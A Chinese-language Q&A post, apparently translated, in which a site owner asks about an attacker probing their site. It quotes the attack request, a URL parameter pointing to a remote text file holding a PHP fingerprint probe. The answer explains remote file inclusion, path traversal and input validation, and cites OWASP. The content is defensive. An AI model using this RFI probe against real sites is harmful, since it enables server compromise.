一个名叫ShiroHige的家伙正试图入侵我的网站。

他尝试使用以下参数打开页面:

mysite/dir/nalog.php?path=http://smash2.fileave.com/zfxid1.txt???

如果您查看该文本文件,则只是die()
<?php /* ZFxID */ echo("Shiro"."Hige"); die("Shiro"."Hige"); /* ZFxID */ ?>

那么他想使用什么漏洞利用(WordPress?)?

编辑1:

我知道他正在尝试使用RFI

是否有一些流行的脚本可以利用该脚本(Drupal,phpBB等)?

最佳答案

攻击者针对的漏洞可能是利用PHP的include和类似的函数/构造的远程文件包含,这些功能/构造允许加载(remote) file并执行其内容:



请注意,使用readfile只会避免执行加载的文件。但是仍然有可能利用它来加载其他内容,然后将这些内容直接打印给用户。这可用于打印本地文件系统中任何类型文件的纯内容(即Path Traversal)或将代码注入(inject)页面中(即Code Injection)。因此,唯一的保护措施是在使用前验证参数值。

另请参见OWASP’s Development Guide on “File System – Includes and Remote files”以获取更多信息。

10-05 22:50
查看更多